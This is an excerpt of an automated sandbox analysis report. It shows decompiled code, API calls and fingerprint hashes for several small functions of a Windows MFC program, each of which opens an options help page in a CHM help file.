    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 0040B94E
    • #537.MFC42(options_notification.htm), ref: 0040B95F
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    • options_notification.htm, xrefs: 0040B95A
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_notification.htm
    • API String ID: 4033027120-2350321056
    • Opcode ID: 8d445264253baf81820669623b1dd6486b48e8e1ae705e269fa2022031d01ba6
    • Instruction ID: de4b077bcafeb2fc9477f1af60ee6295d3a3491035ea70cc77dbab65dc649856
    • Opcode Fuzzy Hash: 8d445264253baf81820669623b1dd6486b48e8e1ae705e269fa2022031d01ba6
    • Instruction Fuzzy Hash: 23D0C2B1B10200A7CB08BBA6980372D76A0AB48718F008B2FB122962C1CBBC5900421D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041915C(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x44103c, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_common.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 00419161
    • #537.MFC42(options_common.htm), ref: 00419172
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_common.htm
    • API String ID: 4033027120-43166123
    • Opcode ID: 41bb01c50aba8fb9cd1386a4f855ef7b4ef8f7a8b8476b78af7ca317a28eaaf8
    • Instruction ID: 1f6994471c1be5fe7fc66e511bade13a4f30b8d7ff053d854556fa4c1eb8ab82
    • Opcode Fuzzy Hash: 41bb01c50aba8fb9cd1386a4f855ef7b4ef8f7a8b8476b78af7ca317a28eaaf8
    • Instruction Fuzzy Hash: E8D02BF1B10204FBC708BBE6950372DB7609B98718F00871FB132D62C1CBBC5980422D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041B9E9(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x441588, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_ftp.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 0041B9EE
    • #537.MFC42(options_ftp.htm), ref: 0041B9FF
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_ftp.htm
    • API String ID: 4033027120-1390938965
    • Opcode ID: 1b196a3f6abd0987712e0d3d48fa2d4f21b4d43b33a094a0d7db603059b06d00
    • Instruction ID: af76ce968a2c387eb146613913a3f26e3e289c81b4d8dfdc8740f49c7ba33b98
    • Opcode Fuzzy Hash: 1b196a3f6abd0987712e0d3d48fa2d4f21b4d43b33a094a0d7db603059b06d00
    • Instruction Fuzzy Hash: CDD02BB1B10600F7C718BBEA940376D7760EB88758F008B1FB032D62C1CBBC5940421D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00419BDE(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x4411bc, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_diary.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 00419BE3
    • #537.MFC42(options_diary.htm), ref: 00419BF4
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_diary.htm
    • API String ID: 4033027120-3854651660
    • Opcode ID: 9a2eb1ae9f09e527d3c0768cb765748e20811746ab68b9da40dcd38f3a5a49a1
    • Instruction ID: 8677fa96427319e7bbf5c5e0af829bf38f80d6475e3eec2efa39a81e52e7fb65
    • Opcode Fuzzy Hash: 9a2eb1ae9f09e527d3c0768cb765748e20811746ab68b9da40dcd38f3a5a49a1
    • Instruction Fuzzy Hash: CBD05BB1B10640B7C718FBE69513B6D77609B99718F10871FB136962D1CBBC5940461D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041AC78(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x4414a4, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_email.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041AC7D
    • #537.MFC42(options_email.htm), ref: 0041AC8E
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_email.htm
    • API String ID: 4033027120-3085017375
    • Opcode ID: 77ecca67994cc954ace1917f00a0b0907781166b6e7179f14247ee9b7c7f7c1c
    • Instruction ID: 97cd2bc070011daa7521a9aa30d31ad19e46e118973a3e9dcd6c23427f6ef106
    • Opcode Fuzzy Hash: 77ecca67994cc954ace1917f00a0b0907781166b6e7179f14247ee9b7c7f7c1c
    • Instruction Fuzzy Hash: 60D02BB1F10200BBCB08BBE6E40376D77609B88728F10871FB032972C1CBBC5940461D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0042807F(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t8;
    				void* _t14;
    				intOrPtr _t16;
    
    				_t6 = E0043E4E0(0x442ed0, _t14);
    				 *((intOrPtr*)(_t14 - 0x10)) = _t16;
    				_push("options_diary.htm");
    				L0043DE26();
    				 *(_t14 - 4) =  *(_t14 - 4) | 0xffffffff;
    				L004044C9(_t6, _t16, __esi);
    				_t8 = E00422E3C();
    				 *[fs:0x0] =  *((intOrPtr*)(_t14 - 0xc));
    				return _t8;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00428084
    • #537.MFC42(options_diary.htm,?,?,00428079), ref: 00428095
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_diary.htm
    • API String ID: 4033027120-3854651660
    • Opcode ID: 7946a52a8827aa175a3cfc2e443ecb7369cec42abcffda92d82700fd7502353b
    • Instruction ID: bf3dc5ef6dd0596eead45175edc45a470cc679b2149de73810c78d6645989072
    • Opcode Fuzzy Hash: 7946a52a8827aa175a3cfc2e443ecb7369cec42abcffda92d82700fd7502353b
    • Instruction Fuzzy Hash: 29D05EB0B10600A7CB08BBA6E50772DBA61EB88718F10871FB036662C1CBBC5940451D
    Uniqueness

    Uniqueness Score: -1.00%